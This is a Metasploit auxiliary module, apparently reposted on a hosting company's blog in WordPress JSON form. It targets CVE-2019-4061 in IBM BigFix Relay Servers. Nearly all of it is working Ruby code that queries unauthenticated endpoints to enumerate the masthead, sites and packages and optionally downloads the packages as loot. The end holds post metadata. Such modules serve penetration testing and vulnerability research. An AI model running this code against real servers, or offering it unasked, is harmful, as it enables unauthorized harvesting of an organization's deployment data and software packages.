##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report<\/p>\n
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘IBM BigFix Relay Server Sites and Package Enum’,
‘Description’ => %q{
This module retrieves masthead, site, and available package information
from IBM BigFix Relay Servers.
},
‘Author’ =>
[
‘HD Moore’, # Vulnerability Discovery
‘Chris Bellows’, # Vulnerability Discovery
‘Ryan Hanson’, # Vulnerability Discovery
‘Jacob Robles’ # Metasploit module
],
‘References’ =>
[
[‘CVE’,’2019-4061′],
[‘URL’,’https:\/\/www.atredis.com\/blog\/2019\/3\/18\/harvesting-data-from-bigfix-relay-servers’]],
‘DefaultOptions’ =>
{
‘RPORT’ => 52311,
‘SSL’ => true
},
‘License’ => MSF_LICENSE,
‘DisclosureDate’ => ‘2019-03-18’ # Blog post date
))<\/p>\n
register_options [
OptString.new(‘TARGETURI’, [true, ‘Path to the BigFix server’, ‘\/’]),
OptBool.new(‘SHOW_MASTHEAD’, [true, ‘Retrieve information from masthead file’, true]),
OptBool.new(‘SHOW_SITES’, [true, ‘Retrieve site listing’, true]),
OptBool.new(‘SHOW_PACKAGES’, [true, ‘Retrieve packages list’, true]),
OptBool.new(‘DOWNLOAD’, [true, ‘Attempt to download packages’, false])
]\n
register_advanced_options [
OptBool.new(‘ShowURL’, [true, ‘Show URL instead of filename’, false])
]end<\/p>\n
def send_req(uri)
send_request_cgi({
‘uri’ => normalize_uri(target_uri, uri)
})
end<\/p>\n
def masthead
res = send_req(‘masthead\/masthead.axfm’)
return unless res && res.code == 200<\/p>\n
if res.body =~ \/Organization: (.*).\/
print_good($1)
end<\/p>\n
res.body.scan(\/URL: (.*).\/).each do |http|
print_good(http[0])
end
end<\/p>\n
def sites
res = send_req(‘cgi-bin\/bfenterprise\/clientregister.exe?RequestType=FetchCommands’)
return unless res && res.code == 200<\/p>\n
print_status(‘Sites’)
res.body.scan(\/: ([^ ]+)\/).each do |url|
print_good(url[0])
end
end<\/p>\n
def packages
res = send_req(‘cgi-bin\/bfenterprise\/BESMirrorRequest.exe’)
return unless res && res.code == 200<\/p>\n
print_status(‘Packages’)
last_action = nil
@files = {}<\/p>\n
myhtml = res.get_html_document
myhtml.css(‘.indented p’).each do |element|
element.children.each do |text|
if text.class == Nokogiri::XML::Text
next if text.text.start_with?(‘Error’)<\/p>\n
text.text =~ \/^([^ ]+)\/
case $1
when ‘Action:’
# Save Action to associate URLs
text.text =~ \/Action: ([0-9]+)\/
last_action = $1
@files[last_action] = []print_status(“Action: #{last_action}”)
when ‘url’
text.text =~ \/^[^:]+: (.*)\/
uri = URI.parse($1)
file = File.basename(uri.path)
@files[last_action].append(file)
datastore[‘ShowURL’] ? print_good(“URL: #{$1}”) : print_good(“File: #{file}”)
end
end
end
end
end<\/p>\n
def download
print_status(‘Downloading packages’)
@files.each do |action, val|
next if val.empty?
res = send_req(“bfmirror\/downloads\/#{action}\/0”)
next unless res && res.code == 200<\/p>\n
print_status(“Downloading file #{val.first}”)
res = send_req(“bfmirror\/downloads\/#{action}\/1”)
unless res && res.code == 200
print_error(“Failed to download #{val.first}”)
next
end<\/p>\n
myloot = store_loot(‘ibm.bigfix.package’, File.extname(val.first), datastore[‘RHOST’], res.body, val.first)
print_good(“Saved #{val.first} to #{myloot.to_s}”)
end
end<\/p>\n
def run
masthead if datastore[‘SHOW_MASTHEAD’]sites if datastore[‘SHOW_SITES’]packages if datastore[‘SHOW_PACKAGES’] || datastore[‘DOWNLOAD’]download if datastore[‘DOWNLOAD’] && @files != {}
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Report def initialize(info = {})super(update_info(info,‘Name’ => ‘IBM BigFix Relay Server Sites and Package Enum’,‘Description’ => %q{This module retrieves masthead, site, and available package informationfrom IBM BigFix Relay Servers.},‘Author’ =>[‘HD Moore’, # Vulnerability Discovery‘Chris Bellows’, # Vulnerability Discovery‘Ryan Hanson’, # Vulnerability Discovery‘Jacob …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59302","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59302"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59302\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}